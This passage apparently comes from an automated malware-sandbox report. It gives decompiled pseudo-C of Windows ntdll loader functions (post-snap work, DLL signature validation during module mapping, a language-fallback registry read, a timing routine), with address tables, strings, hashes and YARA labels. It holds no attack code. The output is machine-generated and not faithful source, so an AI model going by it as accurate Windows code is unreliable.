												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E048C8A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x49a5c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x49a5c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E048FF380(_t136, 0x4891184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E048D2280(_t108, 0x49a86cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E048E61A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E04989D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E048CFFB0(_t118, _t156, 0x49a86cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E048F9A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}












































                                                            0x048c8799
                                                            0x048c879d
                                                            0x048c87a1
                                                            0x048c87a3
                                                            0x048c87a8
                                                            0x048c87c3
                                                            0x048c87c3
                                                            0x048c87c8
                                                            0x048c87d1
                                                            0x048c87d4
                                                            0x048c87d8
                                                            0x048c87e5
                                                            0x048c87ec
                                                            0x04919bfe
                                                            0x04919c00
                                                            0x04919c02
                                                            0x04919c08
                                                            0x04919c0d
                                                            0x04919c0f
                                                            0x04919c14
                                                            0x04919c2d
                                                            0x04919c32
                                                            0x04919c37
                                                            0x04919c3a
                                                            0x04919c3c
                                                            0x04919c42
                                                            0x04919c42
                                                            0x04919c3c
                                                            0x04919c02
                                                            0x048c87da
                                                            0x048c87df
                                                            0x048c87e3
                                                            0x00000000
                                                            0x00000000
                                                            0x048c87e3
                                                            0x048c87f2
                                                            0x00000000
                                                            0x048c87fb
                                                            0x048c87fd
                                                            0x048c87fe
                                                            0x048c880e
                                                            0x048c880f
                                                            0x048c8810
                                                            0x048c8814
                                                            0x048c881a
                                                            0x048c881c
                                                            0x048c881f
                                                            0x048c8821
                                                            0x048c8822
                                                            0x048c8824
                                                            0x048c8826
                                                            0x048c882c
                                                            0x048c882e
                                                            0x04919c48
                                                            0x04919c48
                                                            0x048c8834
                                                            0x048c8834
                                                            0x048c8837
                                                            0x00000000
                                                            0x00000000
                                                            0x048c8837
                                                            0x048c882e
                                                            0x048c883d
                                                            0x048c8840
                                                            0x048c8843
                                                            0x048c8846
                                                            0x048c8849
                                                            0x048c884c
                                                            0x048c884e
                                                            0x048c8850
                                                            0x048c8852
                                                            0x048c8854
                                                            0x048c8857
                                                            0x048c88b4
                                                            0x048c88b6
                                                            0x048c88b6
                                                            0x048c8859
                                                            0x048c8859
                                                            0x048c8859
                                                            0x048c8861
                                                            0x048c8866
                                                            0x048c886a
                                                            0x048c893d
                                                            0x048c8941
                                                            0x00000000
                                                            0x048c8947
                                                            0x048c8947
                                                            0x048c894a
                                                            0x048c894c
                                                            0x00000000
                                                            0x048c8952
                                                            0x048c8955
                                                            0x048c895a
                                                            0x048c895d
                                                            0x048c895d
                                                            0x048c895f
                                                            0x048c8961
                                                            0x048c8961
                                                            0x048c8968
                                                            0x00000000
                                                            0x00000000
                                                            0x048c896a
                                                            0x048c896b
                                                            0x048c896e
                                                            0x00000000
                                                            0x048c8970
                                                            0x048c8970
                                                            0x048c8970
                                                            0x048c8970
                                                            0x048c8972
                                                            0x048c8972
                                                            0x048c8974
                                                            0x00000000
                                                            0x048c897a
                                                            0x048c897a
                                                            0x048c897d
                                                            0x00000000
                                                            0x048c8983
                                                            0x04919c65
                                                            0x04919c6d
                                                            0x04919c72
                                                            0x04919c75
                                                            0x04919c75
                                                            0x04919c82
                                                            0x04919c86
                                                            0x04919c87
                                                            0x04919c88
                                                            0x04919c89
                                                            0x04919c8c
                                                            0x04919c90
                                                            0x04919c95
                                                            0x04919c97
                                                            0x04919ca0
                                                            0x04919ca3
                                                            0x04919ca9
                                                            0x04919ca9
                                                            0x00000000
                                                            0x04919ca9
                                                            0x04919ca3
                                                            0x00000000
                                                            0x04919c97
                                                            0x048c897d
                                                            0x00000000
                                                            0x048c8974
                                                            0x048c8988
                                                            0x048c8992
                                                            0x048c8996
                                                            0x00000000
                                                            0x048c8996
                                                            0x048c894c
                                                            0x00000000
                                                            0x048c8870
                                                            0x048c887b
                                                            0x048c887d
                                                            0x048c887f
                                                            0x048c8881
                                                            0x048c8884
                                                            0x048c8884
                                                            0x048c8886
                                                            0x048c8889
                                                            0x048c888c
                                                            0x048c888e
                                                            0x048c8891
                                                            0x048c8891
                                                            0x048c8898
                                                            0x00000000
                                                            0x00000000
                                                            0x048c889a
                                                            0x048c889b
                                                            0x048c889e
                                                            0x00000000
                                                            0x00000000
                                                            0x048c88a0
                                                            0x048c88a8
                                                            0x048c88b0
                                                            0x048c88b2
                                                            0x048c88d3
                                                            0x048c88d5
                                                            0x00000000
                                                            0x048c88d7
                                                            0x048c88db
                                                            0x048c88dc
                                                            0x048c88e0
                                                            0x048c88e8
                                                            0x048c88ee
                                                            0x048c88f0
                                                            0x048c88f3
                                                            0x048c88fc
                                                            0x048c8901
                                                            0x048c8906
                                                            0x048c890c
                                                            0x048c890c
                                                            0x048c890f
                                                            0x048c8916
                                                            0x048c8917
                                                            0x048c8918
                                                            0x048c8919
                                                            0x048c891a
                                                            0x048c891f
                                                            0x048c8921
                                                            0x04919c52
                                                            0x04919c55
                                                            0x04919c5b
                                                            0x04919cac
                                                            0x04919cc0
                                                            0x04919cc0
                                                            0x04919c55
                                                            0x048c8927
                                                            0x048c8927
                                                            0x048c892f
                                                            0x048c8933
                                                            0x00000000
                                                            0x048c88f5
                                                            0x048c88f5
                                                            0x00000000
                                                            0x048c88f7
                                                            0x048c88f7
                                                            0x048c88fa
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x048c88fa
                                                            0x048c88f5
                                                            0x048c88f3
                                                            0x00000000
                                                            0x048c88d5
                                                            0x00000000
                                                            0x048c88b2
                                                            0x048c88c9
                                                            0x00000000
                                                            0x048c88c9
                                                            0x048c887f
                                                            0x048c886a
                                                            0x048c8857
                                                            0x048c8852
                                                            0x048c88bf
                                                            0x048c88bf
                                                            0x048c87aa
                                                            0x048c87ad
                                                            0x048c87ae
                                                            0x048c87b4
                                                            0x048c87b5
                                                            0x048c87b6
                                                            0x048c87b8
                                                            0x048c87bd
                                                            0x048c87c1
                                                            0x048c87f4
                                                            0x048c87fa
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x048c87c1
                                                            0x00000000

                                                            Strings
                                                            • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 04919C18
                                                            • minkernel\ntdll\ldrsnap.c, xrefs: 04919C28
                                                            • LdrpDoPostSnapWork, xrefs: 04919C1E
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                                            • API String ID: 0-1948996284
                                                            • Opcode ID: e46b7ed8f1b4b710f40047263ac74704bf1df549bcf268c7235ebe907dd4587d
                                                            • Instruction ID: 88c8596218504820d1fde0ac49e384c08f8f4457da364ae21df5aa94f882a021
                                                            • Opcode Fuzzy Hash: e46b7ed8f1b4b710f40047263ac74704bf1df549bcf268c7235ebe907dd4587d
                                                            • Instruction Fuzzy Hash: 6D912471A4020AAFEF18EF59C880ABAB7B5FF44356B054A6DD805EB650E770FD01CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 048C7E41, Relevance: 3.9, Strings: 3, Instructions: 174COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 98%
                                                            			E048C7E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E048CCEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E048BC9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x49a5780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E04935510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x49a5780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E048D7D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E048D7D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E04937016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E048D7D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E048D7D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E04937016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E048EA1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E048BB1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}




















                                                            0x048c7e4c
                                                            0x048c7e50
                                                            0x048c7e55
                                                            0x048c7e58
                                                            0x048c7e5d
                                                            0x048c7e71
                                                            0x048c7f33
                                                            0x048c7e77
                                                            0x048c7e77
                                                            0x048c7e79
                                                            0x048c7e79
                                                            0x048c7e7e
                                                            0x048c7f45
                                                            0x04919848
                                                            0x00000000
                                                            0x04919848
                                                            0x048c7f4e
                                                            0x048c7f53
                                                            0x048c7f5a
                                                            0x00000000
                                                            0x00000000
                                                            0x0491985a
                                                            0x04919862
                                                            0x04919866
                                                            0x00000000
                                                            0x0491986c
                                                            0x00000000
                                                            0x0491986c
                                                            0x048c7e84
                                                            0x048c7e84
                                                            0x048c7e8d
                                                            0x04919871
                                                            0x048c7eb8
                                                            0x048c7ec0
                                                            0x048c7ec0
                                                            0x048c7e9a
                                                            0x0491987e
                                                            0x00000000
                                                            0x00000000
                                                            0x04919884
                                                            0x0491988b
                                                            0x049198a7
                                                            0x049198ac
                                                            0x049198b1
                                                            0x049198b6
                                                            0x049198b8
                                                            0x049198b8
                                                            0x049198b9
                                                            0x00000000
                                                            0x049198b9
                                                            0x048c7ea0
                                                            0x048c7ea7
                                                            0x00000000
                                                            0x00000000
                                                            0x048c7eac
                                                            0x048c7eb1
                                                            0x048c7ec6
                                                            0x048c7ed0
                                                            0x049198cc
                                                            0x048c7ed6
                                                            0x048c7ed6
                                                            0x048c7ed6
                                                            0x048c7ede
                                                            0x048c7ee3
                                                            0x049198e3
                                                            0x049198f0
                                                            0x04919902
                                                            0x049198f2
                                                            0x049198fb
                                                            0x049198fb
                                                            0x04919907
                                                            0x0491991d
                                                            0x0491991d
                                                            0x04919907
                                                            0x049198e3
                                                            0x048c7ef0
                                                            0x048c7f14
                                                            0x048c7f14
                                                            0x048c7f1e
                                                            0x04919946
                                                            0x048c7f24
                                                            0x048c7f24
                                                            0x048c7f24
                                                            0x048c7f2c
                                                            0x0491996a
                                                            0x04919975
                                                            0x04919975
                                                            0x0491997e
                                                            0x04919993
                                                            0x04919993
                                                            0x0491997e
                                                            0x00000000
                                                            0x048c7ef2
                                                            0x048c7efc
                                                            0x048c7f0a
                                                            0x048c7f0e
                                                            0x04919933
                                                            0x00000000
                                                            0x04919933
                                                            0x00000000
                                                            0x048c7f0e
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x048c7eb1

                                                            Strings
                                                            • LdrpCompleteMapModule, xrefs: 04919898
                                                            • minkernel\ntdll\ldrmap.c, xrefs: 049198A2
                                                            • Could not validate the crypto signature for DLL %wZ, xrefs: 04919891
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                            • API String ID: 0-1676968949
                                                            • Opcode ID: 7be310a8204f44478c8f6ca70bb100f92fcfa8c8114e87b909d5497135025412
                                                            • Instruction ID: 80e6045dcc694a3f7f50900573c32c1ce1e935204ea8d5bd30e4c731f1e766ff
                                                            • Opcode Fuzzy Hash: 7be310a8204f44478c8f6ca70bb100f92fcfa8c8114e87b909d5497135025412
                                                            • Instruction Fuzzy Hash: F051F272A0074ADBEB21CB59C854B2ABBE4AB01B18F040BA9E951DB7E1D774FD00CF51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 048BE620, Relevance: 3.9, Strings: 3, Instructions: 165COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 93%
                                                            			E048BE620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E048BF358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E048F95D0();
						}
						if(_t78 != 0) {
							L048D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E048FFA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E048FBB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E048F9600();
					if(_t97 < 0) {
						goto L6;
					}
					E048FBB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L048BF018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E048FBB40(_t83, _t102 + 0x24, _t78);
								if(L048C43C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E048FBB40(_t84, _t102 + 0x24, _t94);
									if(L048C43C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}































                                                            0x048be620
                                                            0x048be628
                                                            0x048be62f
                                                            0x048be631
                                                            0x048be635
                                                            0x048be637
                                                            0x048be63e
                                                            0x04915503
                                                            0x04915503
                                                            0x048be64c
                                                            0x048be64c
                                                            0x048be651
                                                            0x00000000
                                                            0x00000000
                                                            0x048be661
                                                            0x048be665
                                                            0x0491542a
                                                            0x048be715
                                                            0x048be71a
                                                            0x048be71c
                                                            0x048be720
                                                            0x048be720
                                                            0x048be727
                                                            0x048be736
                                                            0x048be736
                                                            0x048be743
                                                            0x048be743
                                                            0x048be673
                                                            0x048be678
                                                            0x048be67d
                                                            0x048be682
                                                            0x048be685
                                                            0x048be692
                                                            0x048be69b
                                                            0x048be6a3
                                                            0x048be6ad
                                                            0x048be6b1
                                                            0x048be6b2
                                                            0x048be6bb
                                                            0x048be6bf
                                                            0x048be6c0
                                                            0x048be6c8
                                                            0x048be6cc
                                                            0x048be6d5
                                                            0x048be6d9
                                                            0x00000000
                                                            0x00000000
                                                            0x048be6e5
                                                            0x048be6ea
                                                            0x048be6f9
                                                            0x048be70b
                                                            0x048be70f
                                                            0x04915439
                                                            0x0491545e
                                                            0x0491545e
                                                            0x00000000
                                                            0x0491545e
                                                            0x0491543b
                                                            0x0491543e
                                                            0x04915440
                                                            0x04915445
                                                            0x04915472
                                                            0x04915475
                                                            0x0491548d
                                                            0x04915493
                                                            0x049154a9
                                                            0x00000000
                                                            0x00000000
                                                            0x049154ab
                                                            0x049154b4
                                                            0x049154bc
                                                            0x049154c8
                                                            0x049154de
                                                            0x049154fb
                                                            0x049154e0
                                                            0x049154e6
                                                            0x049154eb
                                                            0x049154eb
                                                            0x049154de
                                                            0x00000000
                                                            0x049154bc
                                                            0x04915477
                                                            0x0491547a
                                                            0x04915480
                                                            0x04915483
                                                            0x04915486
                                                            0x0491548b
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0491548b
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x04915447
                                                            0x04915447
                                                            0x04915447
                                                            0x04915447
                                                            0x0491544e
                                                            0x00000000
                                                            0x00000000
                                                            0x04915450
                                                            0x04915452
                                                            0x04915455
                                                            0x0491545a
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0491545c
                                                            0x0491546a
                                                            0x0491546d
                                                            0x0491546f
                                                            0x00000000
                                                            0x0491546f
                                                            0x048be70f

                                                            Strings
                                                            • @, xrefs: 048BE6C0
                                                            • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 048BE68C
                                                            • InstallLanguageFallback, xrefs: 048BE6DB
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                            • API String ID: 0-1757540487
                                                            • Opcode ID: 68b66ce3086f2f04c28932b65f605c6e3bc53cf73ae0fefc69a2176fde5bcb70
                                                            • Instruction ID: 5539e3487f7a0726a83f742bc4c69b8570f423ac06c203b0ffcdc28245859e4d
                                                            • Opcode Fuzzy Hash: 68b66ce3086f2f04c28932b65f605c6e3bc53cf73ae0fefc69a2176fde5bcb70
                                                            • Instruction Fuzzy Hash: 83518175508359AFD714DF68C440AABB3E8AF88728F060E2EF985D7250F774EA048792
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 048DB944, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 76%
                                                            			E048DB944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x49ad360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E048D7D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E04988CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E048F9E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E048FB640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E048FCE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E048D7D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E04988F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E048FAF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x49a8628; // 0x0
								_v68 = _t77;
								_t78 =  *0x49a862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x49a8628; // 0x0
							_t116 =  *0x49a862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}
















































                                                            0x048db94c
                                                            0x048db956
                                                            0x048db95c
                                                            0x048db95e
                                                            0x048db964
                                                            0x048db969
                                                            0x048db96d
                                                            0x048db96d
                                                            0x048db970
                                                            0x048db974
                                                            0x048db97a
                                                            0x048dbadf
                                                            0x048dbadf
                                                            0x048dbae2
                                                            0x048dbae4
                                                            0x048dbae6
